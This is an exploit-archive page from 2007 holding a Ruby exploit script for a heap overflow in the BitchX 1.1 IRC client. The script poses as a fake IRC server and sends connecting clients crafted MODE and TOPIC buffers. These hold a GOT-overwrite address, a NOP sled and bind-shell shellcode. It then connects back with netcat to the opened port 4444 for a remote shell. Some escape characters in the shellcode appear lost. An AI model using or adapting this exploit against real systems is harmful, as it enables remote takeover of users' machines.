Home / os / solaris

bitchx-heap.txt

Posted on 28 August 2007

#!/usr/bin/env ruby ###################################################### # BitchX-1.1 Final MODE Heap Overflow [0-day] # By bannedit # Discovered May 16th 2007 # - Yet another overflow which can overwrite GOT # # I found this vuln after modifying ilja's ircfuzz # code. Currently this exploit attempts to # overwrite the GOT with the ret address to the # shellcode. # # The actually vulnerability appears to be a stack # overflow in p_mode. Due to input size restrictions # the overflow can't occur on the stack because we can # only overflow so much data. Luckily though we # overwrite a structure containing pointers to heap # data. This allows us to overwrite the GOT. # # Reliability of this exploit in its current stage is # limited. There appears to be several factors which # restrict the reliability. ####################################################### require 'socket' #the linux 2.6 target most effective atm targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => '0x8154d70','freebsd' => '0x41414141' } shellcode = #fork before binding a shell provides a clean exit "x6ax02x58xcdx80x85xc0x74x05x6ax01x58xcdx80"+ #metasploit linux x86 shellcode bind tcp port 4444 "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xfc"+ "x98xd8xb8x83xebxfcxe2xf4xcdx43x8bxfbxafxf2xdaxd2"+ "x9axc0x41x31x1dx55x58x2exbfxcaxbexd0xedxc4xbexeb"+ "x75x79xb2xdexa4xc8x89xeex75x79x15x38x4cxfex09x5b"+ "x31x18x8axeaxaaxdbx51x59x4cxfex15x38x6fxf2xdaxe1"+ "x4cxa7x15x38xb5xe1x21x08xf7xcaxb0x97xd3xebxb0xd0"+ "xd3xfaxb1xd6x75x7bx8axebx75x79x15x38" port = (ARGV[0] || 6667).to_i sock = TCPServer.new('0.0.0.0', port) ret = (targets['linux 2.6 Hardened (FC6)'].hex) puts "----------------------------------------------" puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -" puts "- By bannedit -" puts "----------------------------------------------" puts " [-] listening for incoming clients..." while (client = sock.accept) ip = client.peeraddr buffer = client.gets puts "[<] #{buffer}" hostname = ([ret].pack('V')) * 13 nick = "bannedit" #Fake server reply to connection buffer = ":#{nick} MODE #{nick} :+iw "+ ":0 001 #{nick} :biznitch-1.0 "+ ":5 002 #{nick} :biznitch-1.0 "+ ":6 003 #{nick} :a "+ ":aaa 004 #{nick} :a "+ ":aaa 005 #{nick} :a "+ ":aaa 251 #{nick} :a "+ ":aaa 252 #{nick} :a "+ ":aaa 253 #{nick} :a "+ ":aaa 254 #{nick} :a "+ ":aaa 255 #{nick} :a "+ ":aaa 375 #{nick} :a "+ ":aaa 372 #{nick} :a "+ ":aaa 376 #{nick} :a " join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick} "+ ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers " puts "[>] sending fake server response" client.send(buffer, 0) sleep(2) # client.send(join, 0) topic = ":aaa TOPIC #hackers:" ret = ret + 0x200 topic<< ([ret].pack('V')) * 100 topic<< " " for i in 0..20 client.send(topic, 0) end puts "[>] sending evil buffer" evilbuf = ":#{hostname} MODE " evilbuf<< "#{nick} :aaa" ret = ret + 0x200 evilbuf<< ([ret].pack('V')) * 200 evilbuf<< "x90" * (1126 - shellcode.length) evilbuf<< shellcode evilbuf<< "x90" * 40 evilbuf<< " " for i in 0..5 client.send(evilbuf, 0) end sleep(10) #wait for the shellcode to do its thing... puts "[+] exploit completed if successful port 4444 should be open" puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell... " fork { system("nc #{ip[3]} 4444") puts "[+] exiting shell dropping back to listener" } end

 

TOP